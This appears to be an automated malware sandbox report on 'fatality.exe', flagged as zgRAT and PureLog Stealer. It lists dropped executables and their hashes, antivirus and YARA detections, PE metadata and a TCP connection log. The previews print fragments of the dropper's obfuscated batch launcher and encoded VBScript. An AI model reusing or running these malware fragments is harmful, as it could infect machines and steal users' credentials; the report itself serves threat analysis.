                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\Idle.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):89
                                                                                                                                                          Entropy (8bit):5.014619947625862
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:3:xDGTLz6PGKvAKa6YonqQILiM0XESLI3i9A:xDIz6PG0La6zILiMr4IS9A
                                                                                                                                                          MD5:DE5B4FDE5BC10D0F76A55EB9D249AB56
                                                                                                                                                          SHA1:751938B6AB03340842B429805FD2DA1AA0D8C964
                                                                                                                                                          SHA-256:009AA3F866391C87BD840EFB9B6B4EB33FC4DCB625CD23E436D0C9383E033F0F
                                                                                                                                                          SHA-512:58F02657DB363B742C6AEE66CCD5A6B279280E2DD09D7394B7B9907CA2CD005CD67EE88CA98D533605E30608FC61ABC6F51F7D3BE4A3813D7414D280B6F16A1F
                                                                                                                                                          Malicious:false
                                                                                                                                                          Preview:%ENrfyRjMcxlV%%CWcjcFQ%..%VaremYySQf%"C:\blockcomSession/containerReview.exe"%VRGeLHaFaS%
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:data
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):236
                                                                                                                                                          Entropy (8bit):5.863135001723359
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:G/kgwqK+NkLzWbHa/JUrFnBaORbM5nCeHWfwtqbcl3TjW67:G/kBMCzWLauhBaORbQCmWYtqbclT667
                                                                                                                                                          MD5:D2DD350044CE1FE408A44A036A7E6A0D
                                                                                                                                                          SHA1:3597E45DEB69F4AA4749855E9ED452A39A9C7D42
                                                                                                                                                          SHA-256:487BFE07ABFF347481F10C648717AAB8008C7606C026B920358544F85C25E1B2
                                                                                                                                                          SHA-512:81147D83DC5FFD1ADB10ADD8486F6DAC65DF0E7C579F8244EF8F3D6F646CED97FAD3F55A178CED9B60F5F23BB77A0E29BCCB22651280A9EAE135976AF71C366A
                                                                                                                                                          Malicious:true
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                          Preview:#@~^0wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!ZT*@#@&U+DP.ktU4+^V~',Z.nmY+}8L.mYvE.?1DbwORj4.VsJ*@#@&q/4j4+Vs "EUPr/=z8^W13mK:Un/kkGxJz]f.!w.z:O,04B[Dn4`h3M.}tW\ _2xUn!.A!(TVyt^R(CDJS,!BP0mVknWUMAAA==^#~@.
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):290
                                                                                                                                                          Entropy (8bit):5.782645723344065
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6:im8xWrpDYqQhS/APU+urlob6QZnx2glqXPKEH34QkLg:F8QCqQIIsfJ6Nx2KqCK4Qks
                                                                                                                                                          MD5:0529574E91154EEBB6B8516A400A3B60
                                                                                                                                                          SHA1:106A541128B6FB576BC513FD9F72EAA45FB862DE
                                                                                                                                                          SHA-256:6D407CF8493DC2C1F511D16A94491851028056AE69F3DA9021722A16C97DA2BF
                                                                                                                                                          SHA-512:2B621B3F2C4EA9C5ECC25EACA31223154F64947F016CDACC37789FAC354939DDDC55106FC1807D889BA0AD25A229A62ECBDBFC135A0352091DC0920091432925
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\Users\user\Desktop\fatality.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\containerReview.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (960), with no line terminators
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):960
                                                                                                                                                          Entropy (8bit):5.918376463190542
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24:wCF8LKFLCpqpEBcJhzJ/Z6TRdgCfgZNEYNLIfvG4X+JONnID:wqFocHJhyD4ESM37vZE
                                                                                                                                                          MD5:BFB18DE77277E95DC1FE33ADA3A362A9
                                                                                                                                                          SHA1:9AEE3C1ECCE621DB2F4F077060BB31F942394187
                                                                                                                                                          SHA-256:22B9E0043A6DD3C64E2A5FEE3933CF6C339772F8B9C6A6A3B0E9FAF87DFA3B31
                                                                                                                                                          SHA-512:E0D120F10D00C412E6C95D3FD3E6A356204C339B6B9D8A26A2F16F0DA8C54AC87BAC67D21330525CB57393AAE5E0ACBB81E0502EF00A65A4E50460578E6C61D0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Process:C:\blockcomSession\containerReview.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):2006016
                                                                                                                                                          Entropy (8bit):7.565400810273061
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:24576:Ens6R8MzM9PKio0d/wAJqc47Z9CN1rgtq1DBukkM3vCRj8Joo4ytx605H3uG2nkZ:EaocGZcrgtq1NVkMfko4u6EL29qN
                                                                                                                                                          MD5:F568E43BC473CD8CEB2553C58194DF61
                                                                                                                                                          SHA1:14C0FFF25EDFD186DAB91EE6BCC94450C9BED84D
                                                                                                                                                          SHA-256:C91375814E8A5BB71736CE61FA429BC7B98A2B7B2A254B9967C51F3FCCFACD52
                                                                                                                                                          SHA-512:47CF66CE90FECD147077C72DC3F06DB2199B9BC96E887915D6B0D4BFEA7577D60A7345DA6E5BC59967D02528FBDF6C8BF86233261338F782B9185C890FBC400E
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\blockcomSession\smss.exe, Author: Joe Security
                                                                                                                                                          Antivirus:
                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 83%
                                                                                                                                                          File type:MS-DOS executable PE32 executable (GUI) Intel 80386, for MS Windows, MZ for MS-DOS
                                                                                                                                                          Entropy (8bit):7.743793231206972
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                          File name:fatality.exe
                                                                                                                                                          File size:3'457'619 bytes
                                                                                                                                                          MD5:c883ea559bee9a0cb393aa32dcaf5d80
                                                                                                                                                          SHA1:995dfd0d9d504bec628e7d7297962677d8ab32cb
                                                                                                                                                          SHA256:bfd1aabb65dfce7b7c5f2d444917baa23fd04d6047e62cd1aaf9cb2a9ca9d3a9
                                                                                                                                                          SHA512:9ee8ef8a9912b14bcbeb3c13b2670c92eecc17c4a8a719d6bd9935f17239a244457e2f711c01e374febd767c866d6c563bad97e687680919ca0c017d738626ee
                                                                                                                                                          SSDEEP:98304:db5Nf/dq7yqKM1TcGZ6gtq1/Lko4uVa8N7:hMyqKM1TogtqT44NN7
                                                                                                                                                          TLSH:9BF5E11A5AD14A77C2A4177244A3403E5262DB363E71FF0B391F21E16813BB5DEB22B7
                                                                                                                                                          Icon Hash:b2f0cc697970b124
                                                                                                                                                          Entrypoint:0x40290c
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:
                                                                                                                                                          Time Stamp:0x51593266 [Mon Apr 1 07:08:22 2013 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:8c16c795b57934183422be5f6df7d891
                                                                                                                                                          Instruction
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x198f4 | 0x28 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1d000 | 0x13f0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x220 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x191d4 | 0x1a000 | e9a068bc69a6cce92101af62753d223a | False | 0.35633263221153844 | data | 5.734799312113526 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.data | 0x1b000 | 0x180c | 0x1000 | 620f0b67a91f7f74151bc5be745b7110 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x1d000 | 0x13f0 | 0x2000 | ac8be1e82786d7300b7dfd6d7283f6f8 | False | 0.1881103515625 | data | 3.4247626038178245 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x1d130 | 0xcd0 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 |  |  | 0.21951219512195122
RT_GROUP_ICON | 0x1de00 | 0x14 | data |  |  | 1.15
RT_VERSION | 0x1de14 | 0x1ec | data | English | United States | 0.5020325203252033
RT_MANIFEST | 0x1e000 | 0x3e7 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.42542542542542544
DLL | Import
MSVBVM60.DLL | EVENT_SINK_GetIDsOfNames, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaExitProc, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaAryConstruct2, __vbaVarTstEq, __vbaI2I4, DllFunctionCall, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaAryLock, __vbaVarAdd, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                          Jan 13, 2025 13:17:39.069123030 CET804974974.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:39.069293022 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:39.069726944 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:39.069726944 CET4974980192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:40.302948952 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.309063911 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:40.309159994 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.309391975 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:40.314568043 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025130033 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025161028 CET804975064.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:41.025290012 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:41.147157907 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:41.147216082 CET4975080192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:42.481746912 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.487087965 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:42.487173080 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.487508059 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:42.492291927 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.220982075 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.221009970 CET804975166.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:43.221082926 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:43.221514940 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:43.221549034 CET4975180192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:44.549757957 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.554712057 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:44.554795980 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.554965973 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:44.559757948 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267776012 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267802000 CET804975274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:45.267884970 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:45.271627903 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:45.271652937 CET4975280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:46.777735949 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.782752037 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:46.782897949 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.783688068 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:46.788564920 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504919052 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504941940 CET804975364.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:47.504975080 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.505027056 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.508117914 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:47.508147001 CET4975380192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:48.596764088 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.601906061 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:48.601994038 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.602169037 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:48.607023001 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311116934 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311146975 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.311348915 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.442951918 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.443325996 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:49.448141098 CET804975466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:49.448215008 CET4975480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:50.411776066 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.418905973 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:50.418998003 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.419233084 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:50.424042940 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129062891 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129125118 CET804975574.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:51.129152060 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.129570007 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.141045094 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:51.141110897 CET4975580192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:52.331707001 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.336965084 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:52.337047100 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.337215900 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:52.342046022 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101898909 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101923943 CET804975664.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:53.101998091 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:53.102623940 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:53.102683067 CET4975680192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:54.065152884 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.070049047 CET804975766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:54.070163012 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.070306063 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.075093985 CET804975766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:54.780528069 CET804975766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:54.780591011 CET804975766.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:54.780642986 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.780643940 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.786783934 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:54.786827087 CET4975780192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:55.690625906 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:55.695722103 CET804975874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:55.695802927 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:55.696208000 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:55.701083899 CET804975874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:56.431293964 CET804975874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:56.431333065 CET804975874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:56.431345940 CET804975874.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:56.431360960 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:56.431394100 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:56.431394100 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:56.436590910 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:56.436613083 CET4975880192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:17:57.520453930 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:57.525388002 CET804975964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:57.525476933 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:57.528532982 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:57.533293962 CET804975964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:58.251730919 CET804975964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:58.251763105 CET804975964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:58.251797915 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:58.251820087 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:58.256788969 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:58.257498980 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:58.261743069 CET804975964.233.167.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:58.261789083 CET4975980192.168.2.464.233.167.82
                                                                                                                                                          Jan 13, 2025 13:17:59.193581104 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:59.198787928 CET804976066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:59.198865891 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:59.216964006 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:17:59.221752882 CET804976066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:59.925331116 CET804976066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:59.925390005 CET804976066.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:17:59.925465107 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:00.072237015 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:00.072272062 CET4976080192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:00.848839998 CET4976280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:21.173336029 CET805667466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:21.173366070 CET805667466.102.1.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:21.173415899 CET5667480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:21.176371098 CET5667480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:21.176415920 CET5667480192.168.2.466.102.1.82
                                                                                                                                                          Jan 13, 2025 13:18:21.856642962 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:21.861588955 CET805668274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:21.861654997 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:21.863100052 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:21.867906094 CET805668274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:22.602381945 CET805668274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:22.602461100 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:22.602463961 CET805668274.125.133.82192.168.2.4
                                                                                                                                                          Jan 13, 2025 13:18:22.602696896 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:22.603897095 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:22.604190111 CET5668280192.168.2.474.125.133.82
                                                                                                                                                          Jan 13, 2025 13:18:22.608833075 CET805668274.125.133.82192.168.2.4
